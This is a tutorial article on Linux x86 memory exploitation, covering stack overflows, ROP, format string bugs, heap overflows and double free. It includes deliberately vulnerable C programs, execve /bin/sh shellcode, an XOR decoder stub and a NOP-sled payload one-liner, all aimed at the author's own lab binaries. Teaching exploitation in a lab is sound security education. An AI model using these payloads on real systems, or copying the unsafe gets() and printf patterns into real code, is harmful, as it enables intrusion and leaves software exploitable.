Mastering Memory Exploitation: Fundamentals, Stack Overflows, Shellcode, Format String Bugs, and Heap Overflows
In the world of cybersecurity, exploiting vulnerabilities is a technical art form that combines deep knowledge of systems with a practical approach to manipulating them. This article takes you from the foundations of memory management to advanced exploitation techniques like stack overflows, writing shellcode, exploiting format string vulnerabilities, and taking advantage of heap overflows. By the end of this guide, you’ll have both a theoretical understanding and hands-on experience with these techniques, making you a more effective vulnerability researcher.
Before You Begin: Understanding the Core Concepts
Memory Management Refresher
Memory is a crucial aspect of software exploitation, and before diving into more advanced techniques, it’s essential to understand how it is managed in a typical Linux environment. When a program runs, its memory is divided into different segments:
- Text Segment: Stores the program’s machine code.
- Data Segment: Holds global variables and static data.
- Heap: Dynamically allocated memory that grows upward.
- Stack: Stores local variables and function call information and grows downward.
The key areas for exploitation are the stack and the heap. Most of the bugs covered in this article live there: buffer overflows, heap corruption, and injected shellcode.
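On Linux, the layout described above can be inspected through the /proc/<pid>/maps file. The following is a minimal sketch that parses lines in that format; the sample lines, addresses, and the /tmp/overflow path are illustrative assumptions, not output captured from a real process.

```python
from typing import NamedTuple


class Region(NamedTuple):
    start: int
    end: int
    perms: str
    label: str


def parse_maps_line(line: str) -> Region:
    """Parse one line in the /proc/<pid>/maps format."""
    fields = line.split(maxsplit=5)
    start_hex, end_hex = fields[0].split("-")
    # The sixth field (pathname or [heap]/[stack]) is absent for anonymous maps.
    label = fields[5].strip() if len(fields) > 5 else "(anonymous)"
    return Region(int(start_hex, 16), int(end_hex, 16), fields[1], label)


# Illustrative sample lines (assumed values, not from a real process).
SAMPLE = """\
08048000-08049000 r-xp 00000000 08:01 131 /tmp/overflow
0804a000-0804b000 rw-p 00001000 08:01 131 /tmp/overflow
0804b000-0806c000 rw-p 00000000 00:00 0 [heap]
fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack]
"""

regions = [parse_maps_line(line) for line in SAMPLE.splitlines()]
for r in regions:
    print(f"{r.start:08x}-{r.end:08x} {r.perms} {r.label}")
```

In this sample the heap sits at low addresses and the stack near the top of the address space, and the x in the stack's permissions is what an executable stack looks like.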
The Language of Exploits: Assembly
Assembly language lets you interact directly with hardware at a very low level. For Intel’s x86 architecture, you’ll encounter registers like EIP (Instruction Pointer) and ESP (Stack Pointer), which are vital in controlling a program’s execution. For stack-based vulnerabilities, controlling EIP is your golden ticket to executing arbitrary code. Knowing how C constructs translate into assembly is essential for reverse engineering and exploit development.
Stack Overflows: Overflowing Buffers for Control
Understanding the Stack
The stack is a LIFO (Last In, First Out) structure that is integral to handling function calls and storing local variables. When you call a function, arguments, return addresses, and local variables are pushed onto the stack. Since the stack is a tightly organized structure, overflowing a buffer can lead to overwriting important data, such as return addresses, which eventually allows us to hijack the execution flow.
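To make the overwrite concrete, here is a toy model of a single stack frame as a byte array. It assumes the simplest possible layout (a 30-byte buffer followed directly by the saved EBP and the return address); real compilers may insert padding, and the two addresses are made-up values.

```python
import struct

BUF_SIZE = 30  # size of the local buffer in this model


def make_frame(saved_ebp: int, return_addr: int) -> bytearray:
    """Model a frame as [30-byte buffer][saved EBP][return address]."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, return_addr)


def unchecked_copy(frame: bytearray, data: bytes) -> None:
    """Copy input the way gets() does: no check against BUF_SIZE."""
    data = data + b"\x00"        # gets() appends a terminating NUL
    data = data[:len(frame)]     # the model simply ends at the frame boundary
    frame[:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    """Read the little-endian return address stored after the saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


# Hypothetical saved EBP and return address, chosen only for illustration.
frame = make_frame(0xFFFFD0C8, 0x08048456)

unchecked_copy(frame, b"A" * 10)             # fits inside the buffer
print(hex(saved_return_address(frame)))      # return address is intact

unchecked_copy(frame, b"A" * 34 + b"BBBB")   # 30 buffer + 4 saved EBP + 4 more
print(hex(saved_return_address(frame)))      # now holds the bytes of "BBBB"
```

The second copy writes 34 filler bytes over the buffer and the saved EBP, so the next four bytes land exactly on the return address.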
Hands-On: Writing and Exploiting a Vulnerable Program
Let’s revisit a classic vulnerable program that reads user input using gets(), a function notorious for allowing buffer overflows:
#include <stdio.h>
void return_input(void) {
char array[30];
gets(array);
printf("%s\n", array);
}
int main() {
return_input();
return 0;
}
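Since gets() doesn’t check the size of the input, any line of 30 or more characters overflows the buffer (gets() also writes a terminating null byte) and can overwrite the saved return address, leading to arbitrary code execution.
Compile it as a 32-bit binary, since this walkthrough refers to 32-bit registers such as EIP and ESP. Recent compilers warn about or reject gets(), which was removed in C11; if that happens, selecting an older standard such as -std=gnu99 may help.
gcc -m32 -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o overflow overflow.c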
Now, try running the program with a large input:
$ ./overflow
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
This will likely cause a segmentation fault. Using GDB, you can examine how the stack is overwritten, and by carefully crafting input, you can take control of EIP.
gdb ./overflow
(gdb) break *0x080483d0 # example address just before the call to gets(); yours will differ (find it with: disassemble return_input)
(gdb) run
(gdb) x/20x $esp # examine the stack
Once you know which bytes of your input land on the saved return address (and therefore in EIP), you can overwrite it with the address of your shellcode, which is covered in the Shellcode section below.
Basic stack overflows with injected shellcode stop working on systems with protections like a non-executable stack (NX) or Data Execution Prevention (DEP). These protections prevent you from simply injecting and executing shellcode from the stack. However, this doesn’t mean all is lost: this is where Return-Oriented Programming (ROP) comes in.
What Is Return-Oriented Programming?
ROP allows you to execute code even on systems with NX/DEP enabled by reusing existing code in the program. Instead of injecting new code, you string together small pieces of existing code, called gadgets, that already reside in executable memory. Each gadget ends with a ret instruction, allowing you to chain multiple gadgets together, ultimately bypassing memory protections.
Hands-On: Building a ROP Chain
Let’s take a vulnerable program compiled with NX enabled. We’ll locate useful gadgets in the program’s binary using a tool like ROPgadget:
ROPgadget --binary ./vulnerable_binary
You’ll see a list of gadgets like this:
0x080484ad : pop eax ; ret
0x080484b1 : pop ebx ; ret
0x080484b4 : pop ecx ; ret
By chaining these gadgets together, you can achieve the effect of shellcode without injecting new code. You arrange values on the stack so that each pop loads the right value into a register, then return into the desired function or system call (like execve()) to spawn a shell.
Adding ROP to your toolkit allows you to exploit even hardened systems, giving you far more versatility when dealing with modern software protections.
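The mechanics of a chain can be sketched without touching a real binary. The toy below packs gadget addresses and values as little-endian 32-bit words and then walks them the way successive ret and pop instructions would. The gadget addresses come from the sample listing above, and 0x0b is the execve syscall number used by the shellcode later in this article; the other values are placeholders, and the gadget behavior is modeled by hand rather than disassembled.

```python
import struct

# Addresses from the sample ROPgadget listing; behavior modeled by hand.
GADGETS = {
    0x080484AD: "eax",  # pop eax ; ret
    0x080484B1: "ebx",  # pop ebx ; ret
    0x080484B4: "ecx",  # pop ecx ; ret
}


def build_chain(assignments):
    """Pack (gadget address, value) pairs as little-endian 32-bit words."""
    words = []
    for gadget, value in assignments:
        words += [gadget, value]
    return struct.pack(f"<{len(words)}I", *words)


def simulate(chain):
    """Walk the chain the way successive ret instructions would."""
    words = list(struct.unpack(f"<{len(chain) // 4}I", chain))
    regs = {}
    while words:
        addr = words.pop(0)        # ret pops the next gadget address
        reg = GADGETS[addr]        # look up which register the gadget pops
        regs[reg] = words.pop(0)   # the gadget's pop consumes one stack word
    return regs


chain = build_chain([
    (0x080484AD, 0x0B),         # eax = 11, the execve syscall number
    (0x080484B1, 0x11111111),   # placeholder for a pointer argument
    (0x080484B4, 0),            # ecx = 0
])
print(chain.hex())
print(simulate(chain))
```

A real chain would also need a gadget that actually performs the call or syscall; this sketch only shows how stack contents turn into register values.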
Shellcode: Writing Your Own Payloads
What Is Shellcode?
Shellcode is a small piece of assembly code that, when executed, gives you a shell or performs another malicious action. The goal in many exploits is to inject and execute shellcode to gain unauthorized control over a system.
Hands-On: Writing Basic Shellcode
Start by writing simple shellcode that uses system calls to exit a program. On 32-bit x86 Linux, syscalls are invoked using the int 0x80 instruction, and each syscall has a unique number that is placed in EAX (e.g., 1 for exit).
Here’s some basic shellcode to exit a program:
section .text
global _start
_start:
xor eax, eax ; Clear EAX register
mov al, 1 ; Syscall number for exit
xor ebx, ebx ; Exit status
int 0x80 ; Interrupt to invoke syscall
Now, let’s write shellcode to spawn a shell:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
This shellcode will execute /bin/sh on a 32-bit x86 Linux machine. Once you have your shellcode, you can inject it into a vulnerable program like the one we wrote earlier, and use a carefully crafted buffer to jump to it by overwriting EIP.
Testing Your Shellcode
Using GDB, you can test if your shellcode works correctly. Load your vulnerable program and carefully inspect how your shellcode is injected and executed. A typical payload structure includes a NOP sled (\x90\x90...), which pads the buffer so that the overwritten return address only needs to land somewhere in the sled; execution then slides through the NOPs into the shellcode.
When injecting shellcode into a vulnerable program, you’ll often find that certain bytes cannot appear in the payload, such as null bytes (\x00), which terminate string copies like strcpy(), or newline characters (\x0a), which end input read by gets(). If your shellcode contains one of these bytes, it is truncated or mangled before it reaches memory. To work around these restrictions, we use encoded shellcode.
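Before reaching for an encoder, it helps to check whether a payload contains any forbidden bytes at all. This small sketch scans the /bin/sh shellcode shown earlier; the set of bad bytes (null and newline) is an assumption that depends on how the target reads its input.

```python
# The /bin/sh shellcode from this article, as raw bytes.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    b"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
)

# Assumed forbidden bytes: NUL ends strcpy(), newline ends gets().
BAD_BYTES = b"\x00\x0a"


def find_bad_bytes(payload: bytes, bad: bytes = BAD_BYTES):
    """Return (offset, byte value) pairs for every forbidden byte."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


print(len(SHELLCODE), "bytes")
print("bad bytes:", find_bad_bytes(SHELLCODE))
```

An empty result means the payload can pass through that particular input path unmodified; a different input function would call for a different bad-byte set.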
Hands-On: Writing Encoded Shellcode
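Encoded shellcode transforms the original payload into a format that avoids forbidden characters. You’ll often see XOR encoding used for this purpose. The payload is stored in encoded form, and a short decoder stub in front of it restores the original bytes at run time before jumping to them. Here’s an example that wraps the exit shellcode from above, XOR-encoded with 0xaa, in a jump-call-pop decoder:
section .text
global _start
_start:
jmp short call_decoder ; Jump forward so the CALL below can push the payload address
decoder:
pop esi ; ESI = address of encoded_shellcode
xor ecx, ecx ; Clear the loop counter
mov cl, 8 ; Number of encoded bytes
decode_loop:
xor byte [esi], 0xaa ; Decode one byte in place
inc esi ; Advance to the next byte
loop decode_loop ; Repeat until ECX reaches zero
jmp short encoded_shellcode ; Run the decoded payload
call_decoder:
call decoder ; Pushes the address of encoded_shellcode
encoded_shellcode:
db 0x9b, 0x6a, 0x1a, 0xab, 0x9b, 0x71, 0x67, 0x2a ; Exit shellcode XOR 0xaa
By XOR-ing the shellcode with a known value (e.g., 0xaa), we can encode the payload and have the decoder stub restore it at run time, in a way that avoids problematic bytes. The decoder modifies the payload in place, so it must run from memory that is both writable and executable, such as the executable stack used in this article. This method helps your payload survive input paths that reject specific bytes.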
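The encoding step itself is easy to reproduce offline. The sketch below XORs the exit shellcode from earlier in this article with a single-byte key and lists which keys keep the result free of bad bytes. The bad-byte set is an assumption, and the opcode bytes are the standard encodings of the four instructions in that listing.

```python
# xor eax,eax / mov al,1 / xor ebx,ebx / int 0x80
EXIT_SHELLCODE = bytes.fromhex("31c0b00131dbcd80")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (encoding and decoding are the same)."""
    return bytes(b ^ key for b in data)


def usable_keys(payload: bytes, bad: bytes = b"\x00\x0a"):
    """Keys for which neither the key nor any encoded byte is forbidden."""
    return [
        key for key in range(1, 256)
        if key not in bad and not any(b in bad for b in xor_bytes(payload, key))
    ]


encoded = xor_bytes(EXIT_SHELLCODE, 0xAA)
print("encoded:", encoded.hex())
print("decoded:", xor_bytes(encoded, 0xAA).hex())
print("0xaa usable:", 0xAA in usable_keys(EXIT_SHELLCODE))
```

A key that equals any byte of the payload is never usable, because XOR-ing a byte with itself produces the null byte the encoding was meant to avoid.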
Format String Bugs: Exploiting Misformatted Input
What Is a Format String Vulnerability?
A format string vulnerability occurs when user input is passed directly to a function like printf() as the format string instead of as a data argument. This gives attackers the ability to read, and with %n write, memory locations, making it a powerful exploit primitive.
Consider the following vulnerable program:
#include <stdio.h>
void vulnerable_function(char *input) {
printf(input); // Dangerous use of printf
}
int main(int argc, char **argv) {
if (argc > 1) {
vulnerable_function(argv[1]);
}
return 0;
}
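Here, the string provided by the user is passed directly to printf() as the format string. printf() interprets any format specifiers it contains, such as %s or %x, and fetches an argument for each one. If the user supplies specifiers like %x%x%x, no matching arguments exist, so the function prints whatever values happen to occupy the argument positions on the stack.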
Hands-On: Exploiting a Format String Bug
Run the program with malicious input:
$ ./format_vuln %x%x%x
This will print values from the stack in hexadecimal. You can also use %n, which stores the number of characters printed so far through a pointer argument, to write values to memory, leading to even more dangerous exploits.
With enough control over the format string, you can use it to overwrite return addresses or function pointers, redirecting program execution to your shellcode.
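The leak can be illustrated with a toy model of how printf() consumes arguments. This is not how printf() is implemented; it handles only %x and %%, and the stack words are invented values standing in for whatever lies above the call frame.

```python
import re


def toy_printf(fmt: str, stack_words) -> str:
    """Expand %x and %% only; each %x consumes the next word from the stack."""
    words = iter(stack_words)

    def expand(match):
        if match.group(0) == "%%":
            return "%"
        return format(next(words), "x")   # print the next stack word in hex

    return re.sub(r"%%|%x", expand, fmt)


# Hypothetical stack contents: the caller passed no arguments, but the
# words are there anyway and the specifiers read them.
stack = [0xBFFFF6A0, 0x0, 0x41414141]

print(toy_printf("hello", stack))        # no specifiers, nothing leaks
print(toy_printf("%x.%x.%x", stack))     # three specifiers, three words leak
```

With a fixed format such as printf("%s", input), the user's text would be treated as data and the specifiers inside it would never be interpreted.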
Heap Overflows: Corrupting the Heap for Exploitation
Understanding the Heap
The heap is a region of memory used for dynamic memory allocation, and it grows upward, unlike the stack. Functions like malloc() and free() allocate and free memory from the heap. Heap overflows occur when you write more data to a heap-allocated buffer than it can hold, corrupting adjacent memory or heap management structures.
Heap overflows are typically harder to exploit than stack overflows because of the heap’s complex structure, but they can still lead to powerful exploits if done correctly.
Hands-On: Writing a Heap Overflow Vulnerable Program
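Consider the following example where we allocate two heap buffers, fill the second with known contents, and then overflow the first buffer to overwrite data in the second:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
char *buffer1 = (char *)malloc(16);
char *buffer2 = (char *)malloc(16);
if (buffer1 == NULL || buffer2 == NULL) return 1;
strcpy(buffer2, "original"); // Known contents to compare against
printf("Buffer2 before: %s\n", buffer2);
strcpy(buffer1, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); // Far more than 16 bytes: overflows buffer1
printf("Buffer2 after: %s\n", buffer2);
free(buffer1); // May abort here, because chunk metadata was overwritten too
free(buffer2);
return 0;
}
In this program, the buffer overflow in buffer1 overwrites memory beyond its allocated space. With glibc, two small allocations made back to back are usually adjacent, so the overflow runs through the second chunk’s header and into buffer2. Compile and run it:
$ gcc -o heap_overflow heap_overflow.c
$ ./heap_overflow
You can observe how buffer2 gets corrupted: it typically prints a run of As instead of its original contents, and the allocator may abort when the chunks are freed. The same primitive could be leveraged to overwrite control structures in the heap, such as function pointers or heap metadata, leading to code execution.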
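The effect on neighboring memory can be modeled with a flat byte array. The layout below is a deliberately simplified assumption (an 8-byte header in front of each 16-byte buffer), not the exact glibc chunk format, but it shows why an overflow reaches both the next chunk's header and its data.

```python
import struct

HEADER = 8    # assumed header size per chunk in this toy model
USER = 16     # usable bytes per chunk

BUF1 = HEADER                  # offset of buffer1's data
HDR2 = HEADER + USER           # offset of the second chunk's header
BUF2 = HDR2 + HEADER           # offset of buffer2's data


def make_heap() -> bytearray:
    """Two adjacent chunks: [hdr1][buffer1][hdr2][buffer2]."""
    chunk = struct.pack("<II", 0, HEADER + USER) + bytes(USER)
    return bytearray(chunk * 2)


def unchecked_strcpy(heap: bytearray, offset: int, data: bytes) -> None:
    """Copy like strcpy(): NUL-terminated, no check against the buffer size."""
    data = (data + b"\x00")[:len(heap) - offset]   # stay inside the model
    heap[offset:offset + len(data)] = data


def c_string(heap: bytearray, offset: int) -> bytes:
    """Read bytes from offset up to the first NUL, as %s would."""
    return bytes(heap[offset:heap.index(0, offset)])


heap = make_heap()
unchecked_strcpy(heap, BUF2, b"safe")
print(c_string(heap, BUF2))                          # buffer2 before the overflow

unchecked_strcpy(heap, BUF1, b"A" * 28)              # 28 bytes into a 16-byte buffer
print(c_string(heap, BUF2))                          # buffer2 after the overflow
print(hex(struct.unpack_from("<I", heap, HDR2 + 4)[0]))  # clobbered size field
```

The 28 bytes cover buffer1 (16), the second header (8), and the first 4 bytes of buffer2, so both the size field and the neighbor's data end up holding attacker-supplied bytes.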
While heap overflows are common, another dangerous vulnerability related to dynamic memory management is double free. This occurs when a program attempts to free the same memory twice, leading to heap corruption and potential arbitrary code execution.
What Is a Double Free Vulnerability?
In many cases, freeing the same memory block multiple times allows an attacker to manipulate the heap’s internal structures, particularly the free list, which tracks available memory blocks. By corrupting this list, you can cause future malloc() calls to return pointers to attacker-controlled memory.
Hands-On: Triggering a Double Free
Consider the following vulnerable program:
#include <stdlib.h>
int main() {
char *buffer = (char *)malloc(32);
free(buffer);
free(buffer); // Double free!
return 0;
}
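When compiled and executed, this program typically aborts: modern glibc detects this simple case and terminates with a message such as "free(): double free detected in tcache 2". On allocators without such a check, the block ends up on the free list twice, and with careful exploitation you could manipulate heap metadata and gain control over a critical function pointer.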
Compile and test the program:
gcc -o double_free double_free.c
./double_free
In a more complex scenario, triggering a double free could allow you to overwrite the next chunk pointer or redirect execution to an attacker-controlled location, resulting in code execution.
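Why a double free is dangerous is easiest to see with a naive allocator. The toy below keeps a last-in, first-out free list and performs no double-free check; it is a conceptual model only, with an arbitrary starting address and chunk size, and it does not reproduce glibc's data structures or its mitigations.

```python
class ToyAllocator:
    """A deliberately naive allocator with a LIFO free list and no checks."""

    def __init__(self):
        self.free_list = []
        self.next_addr = 0x1000   # arbitrary starting address for the model

    def malloc(self) -> int:
        if self.free_list:
            return self.free_list.pop()   # reuse the most recently freed chunk
        addr = self.next_addr
        self.next_addr += 0x20            # fixed-size chunks keep the model simple
        return addr

    def free(self, addr: int) -> None:
        self.free_list.append(addr)       # no check that addr is already free


heap = ToyAllocator()
a = heap.malloc()
heap.free(a)
heap.free(a)                 # double free: the same chunk is now listed twice

first = heap.malloc()
second = heap.malloc()
print(hex(first), hex(second), first == second)
```

Two live allocations now share one address, so data written through one pointer silently changes what the other one sees, which is the starting point for the metadata and function pointer overwrites described above.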
Advanced Heap Exploitation: Understanding Metadata Corruption
Heap allocators, like the one in glibc, store metadata alongside each allocation: every chunk carries a header recording its size and status flags, and freed chunks are linked into lists called bins. By overflowing a buffer, you can corrupt this metadata, leading to dangerous behavior like arbitrary memory writes or execution of attacker-controlled code.
Tools like Valgrind and GDB are helpful for analyzing heap overflows and tracing heap corruptions in real-time. Once you understand the layout of the heap and how its metadata is managed, you can craft an overflow to control the program’s execution flow.
Let’s get started!
Step 1: Setting Up the Environment
1.1 Install Required Tools
Before starting, ensure you have the following tools installed on your Linux machine:
- GCC (GNU Compiler Collection): To compile our vulnerable program.
- GDB (GNU Debugger): To debug the program and inspect memory.
- Python: For crafting payloads.
- pwntools (optional): A Python library to help with exploit development (useful later).
You can install these tools with:
sudo apt update
sudo apt install gcc gdb python3 python3-pip
pip3 install pwntools
Step 2: Writing a Vulnerable Program
Let’s create a simple C program that is vulnerable to a stack-based buffer overflow. We will use the unsafe gets() function to read user input without bounds checking, leading to a potential buffer overflow.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void vulnerable_function() {
char buffer[64]; // Stack buffer with limited size
printf("Enter some input:\n");
gets(buffer); // Vulnerable function: gets() doesn't check input size
printf("You entered: %s\n", buffer);
}
int main() {
vulnerable_function();
return 0;
}
2.1 Compile the Program
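When compiling, we’ll disable stack protections (like stack canaries) to make exploitation easier, and build a 32-bit binary so that the register names used below (EIP, ESP) apply:
gcc -m32 -fno-stack-protector -z execstack -o vuln_program vuln_program.c
The -m32 flag produces 32-bit code (on a 64-bit Debian or Ubuntu system this usually requires the gcc-multilib package), the -fno-stack-protector flag disables the stack protector, and -z execstack makes the stack executable (allowing shellcode to be run).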
Step 3: Analyze the Program and Trigger the Vulnerability
3.1 Run the Program
Run the program normally to understand its behavior:
./vuln_program
It will ask you to enter input. Since the buffer is only 64 bytes, inputting more than that will overflow it. For now, input:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
You should see the program crash with a segmentation fault. The overflow has likely overwritten part of the stack.
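When you start iterating on inputs, it is convenient to detect the crash from a script instead of by eye. This sketch relies on the documented behavior of Python's subprocess module on POSIX, where a negative return code means the process was killed by that signal number. The helper names are hypothetical, and the commented-out call assumes the ./vuln_program binary built in step 2.1.

```python
import signal
import subprocess


def describe_exit(returncode: int) -> str:
    """Translate a subprocess return code into a short description."""
    if returncode < 0:
        return f"killed by {signal.Signals(-returncode).name}"
    return f"exited with status {returncode}"


def run_with_input(path: str, data: bytes) -> str:
    """Run the target with data on stdin and describe how it ended."""
    proc = subprocess.run(
        [path],
        input=data,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    return describe_exit(proc.returncode)


# Example (requires the compiled binary from step 2.1):
# print(run_with_input("./vuln_program", b"A" * 76 + b"\n"))
```

A result of "killed by SIGSEGV" corresponds to the segmentation fault reported by the shell.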
3.2 Use GDB to Inspect the Stack
Now, let’s use GDB to examine the memory and see what’s happening under the hood:
gdb ./vuln_program
Set a breakpoint on the gets() function to inspect memory before the overflow:
(gdb) break gets
(gdb) run
Once the program pauses at the breakpoint, inspect the stack using:
(gdb) info registers
(gdb) x/20x $esp # View the top of the stack
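Now use the finish command to let gets() run to completion, enter the same long string of As when the program waits for input, and examine the stack again with x/20x $esp. You’ll notice that the data you input (shown as 0x41 bytes) has overwritten the stack, including the saved return address.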
Step 4: Controlling EIP (Instruction Pointer)
The goal of a stack-based buffer overflow is to overwrite the saved return address, the value that is loaded into EIP (the Instruction Pointer) when the function returns and that therefore controls what the program executes next. By providing more input than the buffer can hold, you can overwrite it and redirect execution to your payload (shellcode).
4.1 Find the Offset to EIP
To control EIP, you need to know how many bytes to input before reaching the saved return address on the stack. Start by sending a long run of A characters to confirm that the return address is reachable:
python3 -c 'print("A" * 80)' | ./vuln_program
To see where the crash occurred, feed the same input to the program under GDB and inspect the registers:
(gdb) info registers # Check the value of EIP
You should see that EIP is overwritten with part of the input (0x41414141 for a run of As). Adjust the number of As, or use a non-repeating pattern, until you find the exact offset that overwrites EIP.
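Adjusting the count by hand works, but a non-repeating pattern finds the offset in a single run: every 4-byte window is unique, so the value that ends up in EIP identifies its own position. Below is a minimal standard-library sketch of that idea, using the familiar Aa0Aa1Aa2 style of pattern. The function names are hypothetical; pwntools provides its own helpers for the same purpose.

```python
import string
import struct


def make_pattern(length: int) -> bytes:
    """Build an Aa0Aa1Aa2... pattern of the requested length."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                if len(out) >= length:
                    return bytes(out[:length])
                out += f"{upper}{lower}{digit}".encode()
    return bytes(out[:length])


def find_offset(eip_value: int, length: int = 200) -> int:
    """Return the pattern offset of the 4 bytes found in EIP, or -1."""
    needle = struct.pack("<I", eip_value)   # EIP holds the bytes little-endian
    return make_pattern(length).find(needle)


pattern = make_pattern(200)
print(pattern[:30].decode())

# Suppose the crash showed these four pattern bytes in EIP (taken from
# offset 76 here purely as an illustration).
crashed_eip = struct.unpack("<I", pattern[76:80])[0]
print(hex(crashed_eip), "->", find_offset(crashed_eip))
```

In practice you would send the pattern as the program's input, read EIP from info registers after the crash, and pass that value to find_offset().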
Step 5: Writing Shellcode
Once you control EIP, the next step is to redirect execution to your shellcode, which will spawn a shell. Here’s some simple Linux shellcode that spawns /bin/sh:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
5.1 Create a Payload
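You can combine this shellcode with your exploit using a NOP sled to increase the chances of landing on the shellcode. First, find the location of the buffer in memory using GDB, then create the payload in Python. Write raw bytes with sys.stdout.buffer.write() rather than print(), because Python 3 would otherwise encode characters such as \x90 as multi-byte UTF-8:
python3 -c 'import sys; shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; sys.stdout.buffer.write(b"\x90" * 20 + shellcode + b"A" * (64 - 20 - len(shellcode)) + b"BBBB" + b"\x00\x80\x04\x08" + b"\n")' | ./vuln_program
- The NOP sled (\x90 * 20) means the return address only has to land somewhere in the sled; execution then slides into the shellcode.
- The buffer is padded with A characters until it reaches the length of the buffer.
- BBBB overwrites the saved EBP, assuming it sits directly after the 64-byte buffer. If the offset you found in step 4.1 differs, adjust the padding to match.
- The last four bytes overwrite the saved return address. \x00\x80\x04\x08 is a placeholder; replace it with the little-endian address of the NOP sled that you found in GDB.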
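A one-liner gets hard to read as the payload grows, so the same layout can be assembled in a short script that also checks its own assumptions. This is a sketch only: build_payload is a hypothetical helper, the offset of 68 and the address 0xffffd0a0 are stand-in values that must come from your own GDB session, and the harmless exit shellcode from earlier in this article is used as the payload body.

```python
import struct


def build_payload(shellcode: bytes, offset: int, ret_addr: int,
                  sled_len: int = 20) -> bytes:
    """Lay out: NOP sled | shellcode | padding up to offset | return address."""
    body = b"\x90" * sled_len + shellcode
    if len(body) > offset:
        raise ValueError("sled and shellcode do not fit before the return address")
    payload = body.ljust(offset, b"A") + struct.pack("<I", ret_addr)
    if b"\n" in payload:
        raise ValueError("payload contains a newline, which ends gets() input early")
    return payload + b"\n"   # the trailing newline completes the input line


# Stand-in values for illustration only.
EXIT_SHELLCODE = bytes.fromhex("31c0b00131dbcd80")
payload = build_payload(EXIT_SHELLCODE, offset=68, ret_addr=0xFFFFD0A0)

print(len(payload), "bytes")
print(payload.hex())
```

Writing the result with sys.stdout.buffer.write(payload), or to a file opened in binary mode, keeps every byte intact on its way to the program.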
Step 6: Exploiting the Program
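Before sending the full payload, you can confirm control of EIP with a recognizable marker value:
python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 64 + b"\xef\xbe\xad\xde" + b"\n")' | ./vuln_program
If the 64 bytes of padding match the offset you found in step 4.1, the program crashes with EIP set to 0xdeadbeef; if not, adjust the padding. Then run the program with the payload from step 5.1 instead. If everything is set up correctly, the return address points into the NOP sled and the shellcode spawns a shell.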